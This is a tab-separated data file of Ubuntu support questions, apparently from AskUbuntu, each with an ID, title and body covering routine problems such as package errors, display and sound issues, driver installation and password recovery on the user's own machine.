223460	unity notifications from bbc news do not disappear when i click them	i have a problem with firefox unity integration on the bbc news website . the headline notifications never disappear until i click them . most other programs ' notifications disappear after a while . preferably i 'd like them to time out on their own , but i 've also tried removing them entirely , by deleting ~/.local/share/applications/bbcnewsbbccouk.desktop , however this file reappears the next time i go back to the website .
223461	could n't update and software center is n't working	i am using ubuntu 12.04 lts . the software center isnot working , i ca n't open it . i made the following commands in the terminal sudo apt-get install -f sudo dpkg -- configure -a sudo apt-get update & & sudo apt-get upgrade and found the following results ( at the bottom of the results ) errors were encountered while processing : /var/cache/apt/archives/ubuntu-sso-client-gtk_3.0.2-0ubuntu3_all-deb /var/cache/apt/archives/python-ubuntu-sso-client_3.0.2-0ubuntu3_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and still it isnot working . please help me to get out of this problem . thank you
223463	running super slow on a beastly system	i 've been using ubuntu for years now and starting about last week i started seeing some problems . ubuntu has constantly been freezing when i try to open stuff . or the screen will freeze for about 5-7 seconds . for instance , when i 'm in a terminal it will run smooth , but when i hit the bottom of the terminal and all the text needs to move up , the process freezes for 5-7 seconds . however i know it 's responding because the screen does n't gray out and i can still move my mouse . ( that is just one example ) i installed the latest nvidia drivers about 4 days before this happened . it was running amazingly with those drivers . so i do n't think that 's the problem . ( i tried downgrading just in case and it did n't help ) i 've been dealing with this for about a week and a half . the problems started when i was using 12.04 64-bit . i 've been using 12.10 64-bit since last friday . today i turned my computer on and ubuntu told me it had some errors on the disk so i let it fix them . now when i boot up my computer is slower than ever . it hangs 5-7 seconds when i do so much as click on a menu . it takes 8 seconds for the command ls to work . i would reformat to try and fix , but i 'm on a work computer and i have a lot of stuff on here . i 've tried using unity , gnome , gnome classic with/without effects . same problem on all of them . i am on a dell precision laptop i7 processor nvidia quadro 3000m 8gb of ram 500gb hdd x2 system monitor shows that the system is running fine and is n't peaking anywhere . ps : when i boot from cd , everything runs normal again .
223467	lucid lynx 10.04 iso download	where can i find lucid lynx 10.04 iso image for download ? i want to try something on my present lucid system but i do n't have the iso to reinstall if everything goes sideways .
223476	how to install percona xtrabackup to ubuntu 12.04lts ?	i am trying to install percona xtrabackup to my ubuntu 12.04 lts insatlled on amazon ec2 . i am trying to follow instruction on the xtrabackup installation page here . the instruction follows as add this to /etc/apt/sources.list , replacing squeeze with the name of your distribution : deb http : //repo.percona.com/apt squeeze main deb-src http : //repo.percona.com/apt squeeze main in my case i will replace squeeze with precise but when i open /etc/apt/sources.list for editing it says the following it is suggestion three alternatives instead of editing which are listed a . ) , b . ) and c. ) . my question what should i do to install percona xtrabackup to my box ?
223480	thunderbird mail-outlook 11.10	i want to use thunderbird mail , but can i use my outlook e-mail ? it 's not that urgent , but i want to use it .
223482	ubuntu 12.04 gnome shell disable notification hot corner	is there a way to disable tray or notifications hot corner and show it in activities only in gnome-shell 3.4 ubuntu 12.04 ?
223484	permission denied , are you root ?	i get this error whenever i try to install programs using the terminal : home @ ubuntu : ~ $ apt-get install myunity e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? also i 'm unable to install updates using the terminal .
223486	how do i reset my display settings from the command line ?	i 'm running 12.10 on a dell e5400 laptop and i used xrandr to get the dual monitors working that i connect through a laptop dock . i used xrandr again to switch back to the laptop display when i undocked . the problem is , after a restart , the laptop seems to want to come back up with the dual monitor configuration and the laptop screen stays blank . i can boot into single user mode but i 'm not sure what to do from there to get the display settings reset . any ideas ? there 's no xorg.conf file so i 'm not sure where the settings are stored anymore . thanks .
223493	desktop goes blurry / granulated	after few minutes using , desktop and fonts in unity-menu goes blurry . see screenshot : closer image : in all applications ( browser etc . ) graphics seem to be allright . after rebooting problem disappears for few minutes . changing the wallpaper also makes the desktop clear ( for a while ) but fonts are still blurry . i have ubuntu 12.04 and windows xp dualbooted . lspci : 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) 00:02.1 display controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) lshw -c video : *-display:0 description : vga compatible controller product : 82945g/gz integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : d0100000-d017ffff ioport:30c0 ( size=8 ) memory : c0000000-cfffffff memory : d0180000-d01bffff *-display:1 unclaimed description : display controller product : 82945g/gz integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 02 width : 32 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : memory:40000000-4007ffff have you got any ideas to get this solved ? thank you very much !
223494	ca n't upgrade 12.04.1 to 12.10	i am running ubuntu 12.04.1 and i am trying to upgrade to 12.10 . when i launch the update manager there is no notification for the version 12.10 . i have already tried changing my settings to alert me of all new versions ( not just long-term support releases ) .
223495	blackscreen while installing 12.10	everytime i try to install ubuntu 12.10 on my laptop i get a blackscreen after clicking on install ubuntu , try ubuntu without installation or ubuntu live . i tried it with nomodeset , nolapic and acpi=off too but nothing works . sometimes i even get so a loading screen with nothing but ubuntu 12.10 and 4 dots in the middle , after that shortly a blackscreen appears with some text on it and then the complete blackscreen appears . as i tried with `` no splash '' instead of `` quiet splash '' it shows me something with graphic and determined in it but it was to fast away in a blackscreen to remember . has someone any idea what i can do to get this working ?
223497	why does linux/ubuntu have an unorganised install solution ?	i started using windows 7 again to play some of my games i had been missing and i have to say i 've been relieved to be reintroduced to the standard installation area program files . from what i 've noticed on almost every linux distribution there is like 5 different areas where games/programs or other odds and ends end up . when you install something , i feel as though you pretty much have to guess where it installed at , which honestly do n't make any sense to me . so my question is , why does it appear as though there is no standard on linux/ubuntu ? i 'm not saying it 's a bad thing . i just want to understand the reasons behind it .
223501	ubuntu gets stuck in a login loop	my problem : as you can guess my ubuntu is stuck in a login loop when trying to enter my desktop . means the screen gets black and soon after that the login screen comes back . i 'm a ubuntu newbie so if there 's any answer please explain in a simply understandable language . i 've already read that the problem might be caused by an error depending on the graphics , so i post my graphics to : my graphics : ati radeon 7670m
223504	can tutorial `` dual boot windows 7 & ubuntu 12.04 '' used for dual booting windows 8 & ubuntu 12.10 ?	i previously used this tutorial to dual boot windows 7 and ubuntu 12.04 perfectly . now i have upgraded my windows 7 to windows 8 . and i would like to do a fresh install ( and start all over again like the tutorial ) of ubuntu 12.10 replacing existing ubuntu 12.04 . i like the way the tutorial presents thus can anyone kindly let me know if the tutorial is compatible with what i wan na do now ? i have tried doing little research whether this has been asked , but all i got are not too similar to my question , if there are topics like this i do apologise and feel free to close it . hope to hear from the community . thank you so much . : )
223505	how do i install kodos in 12.10 ?	in previous ubuntu version i used kodos extensively . but the package has been dropped in 12.10 . it 's a neat regular expression testing tool . it 's hard to find an alternative that is not windows only ( or air , or uses action script which bails on more complicated regex , or works in wine - well kinda , but not really ... , etc. ) . so i tried to install kodos from source , which seems to work ( download sourceball and setup.py ) but it wo n't run because of missing pyqt dependencies ( that i ca n't manage to fulfill with anything install-able trough standard packages ) . i then tried to install pyqt manually ( which seems to require manual install of sip and qt too ) and instead of pip i have to use configure.py and qmake . it throws error after error at me . i tried to overcome one after another for over an hour but no luck . it even managed to break calibre and music brains picard . so i purged all the stuff , reinstalled python-sipand python-qt4 from the standard packages and gave up . has anyone managed to get kodos running on 12.10 ? or any hints on how to do it ?
223510	creating block devices for openstack deployment using maas and juju ( nova-volume deployment )	i 'm currently trying to get a openstack deployment working by using maas with 9 nodes and juju . to do this i found this guide , working with ubuntu 12.04 lts and followed it as good as i can . after a vigorous amount of trial and error i finally got to the point where i 'm supposed to deploy nova-volume using the `` custom '' config file . however , when my node is started and shows up as running in the juju status report the service reports the installation failed . i 'm trying to install with juju jitsu by the way . i think it has something to do with the following statement in the openstack.cfg file : nova-volume : # this must be a free block device that is writable on the nova-volume host . block-device : `` xvdb '' overwrite : `` true '' i did some research and found that ( at least i think ) this refers to a xen virtual drive/device , and because the device is not present on the node it 's being deployed to , the installation fails . what i do n't understand is how am i supposed to have such a block device available on a machine which was completely managed by maas . does anyone here have any experience with this and knows of a way to solve this or am i missing something big here . some kind of missing link between the maas and a separate xen host ? my maas server is running ubuntu 12.04lts server .
223512	unable to locate tomcat log file	i am not able to locate the tomcat log files on ubuntu . i looked into /var/log/tomcat6 but the output are these file , catalina.2012-11-23.log catalina.out localhost.2012-11-23.log catalina.2012-11-24.log catalina.out.1.gz localhost.2012-11-24.log any idea which is the correct one ?
223516	installing wifi driver on late macbook 2011 with ubuntu 12.10	i followed the directions on installing ubuntu 12.10 on macbook pro retina ( 10,1 ) sudo apt-get update & & sudo apt-get install b43-fwcutter wget http : //www.lwfinger.com/b43-firmware/broadcom-wl-5.100.138.tar.bz2 tar -xf broadcom-wl-5.100.138.tar.bz2 sudo b43-fwcutter -w /lib/firmware broadcom-wl-5.100.138/linux/wl_apsta.o sudo reboot when i try to do step three i get : tar : broadcom-wl-5.100.138.tar.bz2 : can not open : no such file or directory tar : error is not recoverable : exiting now even though i downloaded the file thrice in firefox and even extracted it in the archive manager . iâm new to linux but its going to be hard to learn something if i cant even connect to wi-fi . please help .
223518	bad downloads with realtek 8111e on ubuntu 10.04	i have recently got a new computer that will be my personal home server , i did n't use linux distribution for a long time so i decided to refresh my knowledge of linux by installing and configuring it with a linux distribution , so i choose ubuntu ( desktop edition ) and after downloading and reconfiguring many thinks i finally get my server up and running . i let it downloading for a week , more or less , and this week later i tried to unrar the archives i downloaded but most of them are corrupts , they have crc problems , i redownload them many times , and some times it downloaded fine , but most times not , so i search for information about that and i found that ubuntu recognize well the 8168/8111e as 8169 , so i have to download and install manually some drivers and try some steps like installing new software and writing the 8169 into a black list , but it doesnt solve my problem i tried to install windows and his proper lan driver and it works fine , so the problem is confirmed that is on ubuntu 10.04 do anyone knows how to fix this ? pd : i got ubuntu 10.04 because is the only one that i could set to run without monitor attached motherboard : e35m1-m pro ubuntu : 10.04
223521	how can i get instant cpu load values ?	i have made a server-client application in which based on cpu usage and load conditions it serves a file request to user . i am using /proc/loadavg values for this . but this utility gives values averaged out over at least 1 minute . i want values averaged out over much lesser time like 1 second or 5 seconds .
223525	cd dirve not mounted	cd drive not mounted afetr i moved to kubuntu 12.10 . my laptop is an acer aspire 5670 . any suggestions , guys ? thanks
223526	stuck installing ubuntu 12.10 on laptop	( initramfs ) unable to find a medium containing a live file system . i get this message from busybox v1.19.3 ( ubuntu 1:1.19.3-7ubuntu1 ) built-in shell ( bash ) . i do n't know what to do if any of you know how to fix this problem please let me know i have install with the same disk on my desktop computer and it worked just fine i do n't know why my laptop which is newer does not install it and i burn the disc from the same laptop
223531	troubleshooting firefox and vlc mozilla plugin	i may be reaching here , but i figured this form would be worth a shot . i 'm working with our new hp `` thinpro '' thin clients based on ubuntu 10.04 , but a very stripped down version of it . its running firefox 8 and i was able to get vlc 1.1.13 with the mozilla plugin installed . i have a customer in my company that is looking to use our thin clients to stream video to these devices . they are looking to purchase a streaming product to do so . the above configuration works when i test on other web sites , but this purchased solution does n't quite work with our configuration . after some coaxing , they said they tested this on a linux os , but not with what we have . they tested on redhat with vlc 2.0 and that 's what they say they will support . here is my question : i hope to see what the core issue is and why there solution will not work and hopefully get them to make some code changes so it does . when i click on there video , the plugin starts up , but then just sits there . no video runs . i can open vlc , media > open network stream ... and paste in the url to the mp4 and the video plays fine . so the issue steams to be in the mozilla plugin . i found there is a debug mode for firefox , but it disables all plugins , which is not what i need . are there any other logs that exists or that i can enable to tell me what might not be working correctly ?
223536	how can i install xfce along side unity ?	i would like to be able to install xfce to run alongside unity so i can choose on startup which de i use , without breaking any features of either de . following this : https : //sites.google.com/site/easylinuxtipsproject/xubuntu note : do n't install nautilus in xubuntu ! this will cause system conflicts . i do n't want to affect any of the features in unity , i.e . i want to be able to use the two interchangeably , so i ca n't follow some suggestions of just cleaning out all the old stuff as that would mean using unity would be changed . can i install unity aside with xfce and switch them as i want ? is this possible in 12.04 ?
223542	prevent alt displaying the terminal menu bar	hitting alt+ [ any character ] in the terminal shows the terminal menu bar . how can i prevent this ? ( it 's annoying when using any program with emacs bindings . ) ( note that i have disabled the hud -- this question is not about disabling the hud . )
223546	failed to set mode on crtc:10	i booted using usb and after using for a day , i tried to install in my new ssd drive . installation was sucess , after that it asked me to restart . when restarted it gave message failed to set mode on crtc:10 and cursor blinking nothing happening after that . what is the issue how do i resolve the issue . its an hp desktop nvidia geforce appreciate your help . sri
223548	password recovery - usual options fail	ubuntu 12.04 1 ) used the recovery menu to get to a root terminal : a ) mount -o remount , rw / ( remounted as rw ) b ) passwd my_username ( entered new password and confirmed ) c ) sync ; reboot or exit then resume from menu d ) login fails to recognize password 2 ) edited grub menu a ) remove ro and add rw init=/bin/bash b ) simple add rw init=/bin/bash login still fails to recognize password , or fails to boot to terminal or gui 3 ) used the recovery menu to get to a root terminal : a ) remounted as rw b ) nano -b /etc/shadow c ) removed my username encrypted password so that there would be an empty password for me . d ) reboot login still fails to recognize password 4 ) used the recovery menu a ) fsck , repair packages , then tried option # 1 login still fails to recognize password 5 ) tried the above with a different password rather than the original , in case that was not 'allowed ' . login still fails to recognize password by the time anyone answers this i will have reinstalled unbutu from scratch , but i 'd still like to know what i might have missed that might have worked .
223549	no sound after video card replaced ( amd radeon hd 7770 )	issue : no sound system : dual boot windows 7 ( sda ) ubuntu 12.04 ( sdb ) 2 harddrives dell xps 730 video card : amd radeo hd 7770 diamond multimedia sound card : creative labs sb x-fi additional info : my sound used to work . then , my old video card ( nvidia geforce 280 ) died . i bought and installed a new video card : radeon hd 7770 . after this , my sound no longer worked in ubuntu ( win7 audio still works ) . everything else in ubuntu , such as video , works fine . i suspect it has something to do with the fact that the radeon card includes sound capability . problem details : if i click on system settings - > sound , the panel freezes and stops responding indefinitely . the sound volume icon at the top of the screen ( by the clock ) shows 3 dashes beside it `` -- - '' , and an empty drop-down box shows if i click on it . ( possibly related to 1 . ) when i reboot my machine , i get the message : `` gnome settings daemon not responding '' . i have to force the reboot . i reinstalled ubunbu ( perserving my home directory ) and the problem persists . diagnostics info : following procedure outlined here : https : //help.ubuntu.com/community/soundtroubleshooting the following is a list of terminal commands , and their output : $ aplay -l list of playback hardware devices there is no listing beyond that , and the command freezes until i hit control-c $ sudo aplay -l **** list of playback hardware devices **** card 0 : xfi [ creative x-fi ] , device 0 : ctxfi [ front/wavein ] subdevices : 256/256 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 ... repeats from # 4 to # 255 subdevice # 255 : subdevice # 255 card 0 : xfi [ creative x-fi ] , device 1 : ctxfi [ surround ] subdevices : 256/256 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 ... repeats from # 4 to # 255 subdevice # 255 : subdevice # 255 card 0 : xfi [ creative x-fi ] , device 2 : ctxfi [ center/lfe ] subdevices : 256/256 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 ... repeats from # 4 to # 255 subdevice # 255 : subdevice # 255 card 0 : xfi [ creative x-fi ] , device 4 : ctxfi [ iec958 non-audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 2 : generic [ hd-audio generic ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : generic [ hd-audio generic ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : generic [ hd-audio generic ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 $ lspci -v | grep -a7 -i `` audio '' 00:0f.1 audio device : nvidia corporation mcp55 high definition audio ( rev a2 ) subsystem : dell device 0224 flags : bus master , 66mhz , fast devsel , latency 0 , irq 23 memory at dfff0000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel -- 01:00.1 audio device : advanced micro devices [ amd ] nee ati device aab0 subsystem : diamond multimedia systems device aab0 flags : bus master , fast devsel , latency 0 , irq 43 memory at dfefc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel -- 03:0a.0 audio device : creative labs sb x-fi subsystem : creative labs device 6002 flags : bus master , medium devsel , latency 32 , irq 18 memory at dbff4000 ( 32-bit , non-prefetchable ) [ size=16k ] memory at dbc00000 ( 64-bit , non-prefetchable ) [ size=2m ] memory at d4000000 ( 64-bit , non-prefetchable ) [ size=64m ] i/o ports at 8c00 [ size=32 ] capabilities : < access denied > notice the diamond multimedia systems device - that seems to be my video card sound . my video card is diamond multimedia . also there 's the weird nvidia device in there . that must either be a remnant of my now removed nvidia graphics card , or else some kind of on-board thing . not sure which . **update** i disabled my onboard sound via the bios settings , and now only 2 cards appear in this list . the nvidia one is gone . $ killall pulseaudio this allows me to open system settings - > sound . but the `` test sound '' button makes no sound and the output volume + mute controls are greyed / disabled at 0 volume . it also allows me to click on the sound control in the `` task bar '' ( beside the clock ) , and a volume slider drops down , but it is disabled / greyed at 0 volume . $ find /lib/modules/uname -r | grep snd /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-88pm860x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-tlv320aic3x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8900.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8978.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-tlv320dac33.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm9090.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-sta32x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-max98088.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-max9850.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-rt5631.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8903.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8580.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8523.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-max9877.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ads117x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8955.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8804.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-sgtl5000.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8750.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm2000.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-tlv320aic32x4.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ak4642.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ad193x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8753.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ak4535.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8985.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8350.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-dfbmcs320.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-cs42l51.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-tlv320aic26.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8737.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-uda1380.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8776.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8995.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-tpa6130a2.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8727.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm5100.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8991.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8510.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-jz4740-codec.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8400.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-lm4857.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8960.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-alc5623.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-cs4270.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-tlv320aic23.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8993.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8961.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8940.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-uda134x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ad1836.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8994.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8782.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-cs4271.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8974.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8983.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8962.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ak4641.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm-hubs.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8971.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8996.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wl1273.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-adav80x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-spdif.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-pcm3008.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-cx20442.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ak4671.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8711.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ad73311.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-max98095.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm9081.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8741.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm1250-ev1.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8988.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-adau1373.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8731.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-l3.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ssm2602.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-da7210.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-ak4104.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8904.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8728.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8770.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/codecs/snd-soc-wm8990.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/soc/snd-soc-core.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/synth/emux/snd-emux-synth.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/synth/snd-util-mem.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd-hrtimer.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd-hwdep.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd-pcm.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd-rawmidi.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/oss/snd-mixer-oss.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd-page-alloc.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq-midi.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq-dummy.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq-virmidi.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq-device.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq-midi-event.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/seq/snd-seq-midi-emul.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/core/snd-timer.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pcmcia/pdaudiocf/snd-pdaudiocf.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pcmcia/vx/snd-vxpocket.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/6fire/snd-usb-6fire.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/snd-usbmidi-lib.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/caiaq/snd-usb-caiaq.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/usx2y/snd-usb-usx2y.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/usx2y/snd-usb-us122l.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/snd-usb-audio.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/usb/misc/snd-ua101.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/opl3/snd-opl3-synth.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/opl3/snd-opl3-lib.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/opl4/snd-opl4-lib.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/opl4/snd-opl4-synth.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-portman2x4.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-serial-u16550.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-mts64.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-mtpav.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/mpu401/snd-mpu401.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/mpu401/snd-mpu401-uart.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/vx/snd-vx-lib.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-dummy.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-aloop.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/pcsp/snd-pcsp.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/drivers/snd-virmidi.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/firewire/snd-firewire-lib.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/firewire/snd-firewire-speakers.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/firewire/snd-isight.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/snd-tea6330t.ko 